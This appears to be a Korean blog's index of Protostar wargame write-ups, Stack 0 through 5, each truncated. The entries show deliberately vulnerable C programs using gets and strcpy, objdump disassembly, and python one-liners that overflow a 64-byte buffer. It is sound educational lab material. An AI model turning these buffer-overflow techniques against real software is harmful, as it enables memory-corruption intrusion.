Wargame/Exploit-Exercises
-
Protostar - Stack 5Wargame/Exploit-Exercises 2014. 5. 19. 11:24
1. 문제 Source#include #include #include #include int main(int argc, char **argv) { char buffer[64]; gets(buffer); } 2. 풀이 user@protostar:~$ cp /opt/protostar/bin/stack5 ./ user@protostar:~$ ls stack5 user@protostar:~$ ulimit -c unlimited user@protostar:~$ python -c "print 'A'*76 + '\xcc\xcc\xcc\xcc' + 'C'*100" | ./stack5 Segmentation fault (core dumped) user@protostar:~$ gdb -q -c /tmp/core.11.st..
-
Protostar - Stack 4Wargame/Exploit-Exercises 2014. 5. 15. 14:57
1. 문제 Source#include #include #include #include void win() { printf("code flow successfully changed\n"); } int main(int argc, char **argv) { char buffer[64]; gets(buffer); } 2. 풀이 user@protostar:/opt/protostar/bin$ objdump -d ./stack4 ./stack4: file format elf32-i386 ... Disassembly of section .text: ... 080483f4 : 80483f4:55 push %ebp 80483f5:89 e5 mov %esp,%ebp 80483f7:83 ec 18 sub $0x18,%esp ..
-
Protostar - Stack 3Wargame/Exploit-Exercises 2014. 5. 15. 14:36
1. 문제 Source#include #include #include #include void win() { printf("code flow successfully changed\n"); } int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08x\n", fp); fp(); } } 2. 풀이 user@protostar:/opt/protostar/bin$ objdump -d ./stack3 ./stack3: file format elf32-i386 ... Disassembly of sec..
-
Protostar - Stack 2Wargame/Exploit-Exercises 2014. 5. 15. 14:29
1. 문제 Source#include #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variable\n"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variable\n"); } else { printf("Try aga..
-
Protostar - Stack 1Wargame/Exploit-Exercises 2014. 5. 15. 14:26
1. 문제 Source#include #include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argument\n"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right value\n"); } else { printf("Try again, you got 0x%08x\n", modified); } } 2. 풀이 user@protosta..
-
Protostar - Stack 0Wargame/Exploit-Exercises 2014. 5. 14. 16:43
1. 문제 Source#include #include #include int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the 'modified' variable\n"); } else { printf("Try again?\n"); } } 2. 풀이 user@protostar:/opt/protostar/bin$ python -c "print 'A'*65" | ./stack0 you have changed the 'modified' variable
-
Protostar 시작Wargame/Exploit-Exercises 2014. 5. 14. 16:39
1. 소개Exploit-Exercises.com의 두번째 단계인 Protostar ( Introducing memory corruption in Linux/x86 ) 페이지를 살펴보면 이번 파트에서 실습하며 공부할 수 있는 공격 기법은 아래와 같다.또한 이번 파트는 ASLR(Address Space Layout Randomisation) 이나 NX(Non-Executable memory) 와 같은 설정이 꺼져있어 입문자에겐 아주 좋은듯 (다음 파트인 Fusion에서 이 설정들을 우회해야 하는듯 하다.) 2. 시작하기시작방법은 Nebula와 동일하다.Exploit-Exercises.com 으로 접속 후 Download 페이지에서 exploit-exercises-protostar-2.iso 이미지를 다운받자..